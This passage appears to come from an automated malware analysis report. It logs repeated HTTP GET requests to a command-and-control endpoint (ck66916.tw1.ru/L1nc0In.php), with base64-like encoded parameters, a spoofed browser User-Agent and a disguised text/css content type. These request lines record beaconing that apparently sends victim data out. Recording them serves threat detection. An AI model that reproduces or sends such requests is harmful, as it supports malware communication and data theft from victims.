DN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
